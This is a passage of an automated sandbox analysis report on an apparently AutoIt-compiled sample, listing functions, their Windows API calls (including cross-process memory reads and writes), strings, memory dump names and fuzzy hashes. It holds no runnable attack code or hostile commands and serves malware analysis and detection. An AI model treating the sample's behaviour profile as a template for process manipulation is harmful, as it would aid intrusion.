CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?,?,00497455), ref: 00497127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?), ref: 00497142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?), ref: 00497150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?), ref: 00497160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?), ref: 0049716C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: caefcbb3efc68a5dd9e23fdbb7f3b7245dc15220c76d048acf7c25b055338715
Instruction ID: 761ebecf069e34bf6dede1410fed92cbc3f4f8a691b396c2b7077be287ea52f5
Opcode Fuzzy Hash: caefcbb3efc68a5dd9e23fdbb7f3b7245dc15220c76d048acf7c25b055338715
Instruction Fuzzy Hash: 79017C72621204BBDB115F64DC45EAA7FAEEB44791F140075FD04D2320D739DD459BA8

Function 004A5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004A526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004A5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A52BC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 40f4bf11f31c079300279765a743d865a7c0590a3d859a8e0df7963fa042fe62
Instruction ID: 8e323142367e3e9df008db7287f56942f3dc9e42ca03a80ae72c079ac6c63c45
Opcode Fuzzy Hash: 40f4bf11f31c079300279765a743d865a7c0590a3d859a8e0df7963fa042fe62
Instruction Fuzzy Hash: 4F015B72D01A19DBCF00DFE4DA48AEEBB78FB1A311F4500A6E941B2241CB3859548BA9

Function 0049810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00498121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0049812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0049813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00498141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00498157

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d8103c18981dbbfaf75b0ebaf4052e60beabaf24f1cb37ca5872b05a34ea942f
Instruction ID: bf2af83fdd224c0cd65ac35b3180386ae9fd9b105dbb53a49fe86521952a407f
Opcode Fuzzy Hash: d8103c18981dbbfaf75b0ebaf4052e60beabaf24f1cb37ca5872b05a34ea942f
Instruction Fuzzy Hash: CFF06271200304BFEB510FA9EC89E6B3FADFF4AB54B04003AF945D6260CF699D45DA68

Function 0049C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0049C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0049C20E
MessageBeep.USER32(00000000), ref: 0049C226
KillTimer.USER32(?,0000040A), ref: 0049C242
EndDialog.USER32(?,00000001), ref: 0049C25C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 83e6392ead336807dfd2684bf22453157d034d203681f243b650aea0e5734378
Instruction ID: 2c78159e21f694c7a3553aaad583a8e6303a1a59ed8bd74e55b790e4416c12ec
Opcode Fuzzy Hash: 83e6392ead336807dfd2684bf22453157d034d203681f243b650aea0e5734378
Instruction Fuzzy Hash: 4401DB309043049BEF245B50DD8EF967B79FF00705F0046BAF542915E1D7F869499B58

Function 004413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004413BF
StrokeAndFillPath.GDI32(?,?,0047B888,00000000,?), ref: 004413DB
SelectObject.GDI32(?,00000000), ref: 004413EE
DeleteObject.GDI32 ref: 00441401
StrokePath.GDI32(?), ref: 0044141C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 7e5921e777c332d8b8e5877151cbadc85a7188c67948fd7cf1783d7d7fa6e6f6
Instruction ID: 3bace7db6e2f7889a86a5853b6761e9258c2512e7a234084848a146c0ce88817
Opcode Fuzzy Hash: 7e5921e777c332d8b8e5877151cbadc85a7188c67948fd7cf1783d7d7fa6e6f6
Instruction Fuzzy Hash: 2AF03130000708DBEB115F66EC4CB5E3FA5AB10726F18C235E869481F1D738499DEF19

Function 00452CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00460DB6: std::exception::exception.LIBCMT ref: 00460DEC
Part of subcall function 00460DB6: __CxxThrowException@8.LIBCMT ref: 00460E01

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 00447A51: _memmove.LIBCMT ref: 00447AAB

__swprintf.LIBCMT ref: 00452ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00452D66

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 1c7094d67b56dcdfa6d31e19f20d1b1a452d93630d6124399badf6eeaa5559e4
Instruction ID: 4bba19d3f7bab2e3a9fd85680b313ca84c8ae6e1ffac60c2d8673c0dafb3760d
Opcode Fuzzy Hash: 1c7094d67b56dcdfa6d31e19f20d1b1a452d93630d6124399badf6eeaa5559e4
Instruction Fuzzy Hash: A1917E711082119FD714FF25C986C6FB7A4EF85718F00091FF8459B2A2EB68ED49CB5A

Function 004AB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00444750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00444743,?,?,004437AE,?), ref: 00444770

CoInitialize.OLE32(00000000), ref: 004AB9BB
CoCreateInstance.OLE32(004D2D6C,00000000,00000001,004D2BDC,?), ref: 004AB9D4
CoUninitialize.OLE32 ref: 004AB9F1

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

Strings

.lnk, xrefs: 004AB99D, 004AB9AB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: b99d41ed09c44dc9a7945251efdc5f1884c34cfab4f40f3b7246f31fd12e2a45
Instruction ID: 23a12d9e834125d7aa0e772632dee1c60a8b88cc7e95e27025b036b1d0270ee8
Opcode Fuzzy Hash: b99d41ed09c44dc9a7945251efdc5f1884c34cfab4f40f3b7246f31fd12e2a45
Instruction Fuzzy Hash: 5AA155746042019FCB10EF15C480D6ABBE5FF8A318F10895EF89A9B3A2CB35EC45CB95

Function 0049B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0049B4BE

Strings

AutoIt3GUI, xrefs: 0049B436
%M, xrefs: 0049B561
Container, xrefs: 0049B43B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%M
API String ID: 3565006973-4195153275
Opcode ID: 8fdbe64f0815ce8ee38b182ec10f3e20f95f94121f65f0e73579a76adf79498d
Instruction ID: 188322e75c8e551cc795ae2433b02b27796bed17c1baf0e20ab6361969b3beb8
Opcode Fuzzy Hash: 8fdbe64f0815ce8ee38b182ec10f3e20f95f94121f65f0e73579a76adf79498d
Instruction Fuzzy Hash: 58916970200601EFDB14DF64D984B6ABBE5FF49714F20856EE94ACB391DB78E841CBA4

Function 0046501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004650AD

Part of subcall function 004700F0: __87except.LIBCMT ref: 0047012B

Strings

pow, xrefs: 00465085, 004650A2

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 24988228e73f519b0ef3b44994686db50052b82498721d8fb2b2350b0484dfc6
Instruction ID: 99b9e2324e01cb9e434482d0ba865b3e913610747cce0e35ceb2aae8cd625b1c
Opcode Fuzzy Hash: 24988228e73f519b0ef3b44994686db50052b82498721d8fb2b2350b0484dfc6
Instruction Fuzzy Hash: AF51596191A502D6DB116B24C9013FF2B94DB41700F20CDABE4D9863AAFE3DCDC59A8F

Function 00488584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0048862B
_memmove.LIBCMT ref: 00488685

Strings

_E, xrefs: 004886FF, 0048DFDC, 0048DFF8
3cE, xrefs: 0048860C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID: 3cE$_E
API String ID: 4104443479-1012516122
Opcode ID: 42a34c5ee660fcbd14668482b2d1045d55cf31c5d8548fb77886e16c7300944e
Instruction ID: ea752afb135390eb6c1fffa51401efec2fff70b09cce711e530851a122496504
Opcode Fuzzy Hash: 42a34c5ee660fcbd14668482b2d1045d55cf31c5d8548fb77886e16c7300944e
Instruction Fuzzy Hash: 39519E70D006199FCB20DF68C880AAEB7F1FF44308F54892EE85ADB351EB35A995CB55

Function 004997F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00499296,?,?,00000034,00000800,?,00000034), ref: 004A14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0049983F

Part of subcall function 004A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004A14B1

Part of subcall function 004A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 004A1409
Part of subcall function 004A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0049925A,00000034,?,?,00001004,00000000,00000000), ref: 004A1419
Part of subcall function 004A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0049925A,00000034,?,?,00001004,00000000,00000000), ref: 004A142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004998AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004998F9

Strings

@, xrefs: 00499911

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 017a0afa92c12af79fc220c0a7772b0955ee316df12ba2c41a0d510a50e674a4
Instruction ID: b482ed8cead05ec2466525879e1d572e369beba8f2f3dcdfc746551872602603
Opcode Fuzzy Hash: 017a0afa92c12af79fc220c0a7772b0955ee316df12ba2c41a0d510a50e674a4
Instruction Fuzzy Hash: 9A413076900118AFDF10DFA9CC41EDEBBB8EB19300F00416AF955B7251DA756E45CBA4

Function 004C7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004CF910,00000000,?,?,?,?), ref: 004C79DF
GetWindowLongW.USER32 ref: 004C79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004C7A0C

Strings

SysTreeView32, xrefs: 004C79B1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ddf9c38a40450cbf8eeb8ed3c81401b44cf29616ebf43c1d20e49068f41d33d3
Instruction ID: 85c5644f782558daf534bfb045cd752b579ced8ee40f837d8aae5fe06f8b85ee
Opcode Fuzzy Hash: ddf9c38a40450cbf8eeb8ed3c81401b44cf29616ebf43c1d20e49068f41d33d3
Instruction Fuzzy Hash: 9931D075204206ABEB518E38CC41FEB7BA9FB04324F20472AF875922E1D739ED519B58

Function 004C73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004C7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004C7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 004C7499

Strings

SysMonthCal32, xrefs: 004C742C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9e8432608c3fc37fae460aa58edd6b1f3df2abedb38057aef8c9bdf727cb1c9a
Instruction ID: f0fe71dc7d65e16dabee0873aa944df2bf9260b2a91511fc92f6f023235cd7af
Opcode Fuzzy Hash: 9e8432608c3fc37fae460aa58edd6b1f3df2abedb38057aef8c9bdf727cb1c9a
Instruction Fuzzy Hash: AD219132500218BBDF158F64CC46FEB3B69EB48724F110119FE156B1D0DA79AC55DBA8

Function 004C6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004C6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004C6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004C6D70

Strings

Listbox, xrefs: 004C6D08

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3d045fbc17fd2e02e27d3918a0e842771d6e9a8a6678d37fcac1fdc3f591c64c
Instruction ID: 072beaf6c8e1a13283b735a941e4737de495fc01fc516ec33505d35bb50744ea
Opcode Fuzzy Hash: 3d045fbc17fd2e02e27d3918a0e842771d6e9a8a6678d37fcac1fdc3f591c64c
Instruction Fuzzy Hash: 6B21F532600118BFEF518F54CC45FBB3B7AEF89750F01C129F9415B2A0C6799C519BA4

Function 004B39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 004B3A66

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Strings

, $, xrefs: 004B3AA6
AUTOITCALLVARIABLE%d, xrefs: 004B3A58
%M, xrefs: 004B39F4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%M
API String ID: 3506404897-3640312197
Opcode ID: 201295ea4a41cbca68d555481644ccb49406659ca974d7863cad36d349677e32
Instruction ID: d0af3ee6b3de724df4505bc270193ddb39b2e8d3c1bbf6c37ebf21afbf35a1ce
Opcode Fuzzy Hash: 201295ea4a41cbca68d555481644ccb49406659ca974d7863cad36d349677e32
Instruction Fuzzy Hash: 77216131600119ABCF10EF66CC82AEE77B5AF48704F60445EE545AB182DB38EA46CB79

Function 004C770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004C7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004C7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004C7794

Strings

msctls_trackbar32, xrefs: 004C7749

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 00251853dc7a0e41150ec4c86bd3075e6f58d82326379c1b5e8e71dfa3f4f6b1
Instruction ID: 3e1721fdd1e27b876b1646f809fcf66bcf2117197d182baf285e32e2e616a27c
Opcode Fuzzy Hash: 00251853dc7a0e41150ec4c86bd3075e6f58d82326379c1b5e8e71dfa3f4f6b1
Instruction Fuzzy Hash: 17112776200208BBEF105F61CC01FEB3B6DEF88B64F11012DF64192190C675E811DF14

Function 00466B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00466B93
__calloc_crt.LIBCMT ref: 00466BAC

Strings

@BP, xrefs: 00466BC3
O, xrefs: 00466BD1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __calloc_crt
String ID: O$@BP
API String ID: 3494438863-1647089760
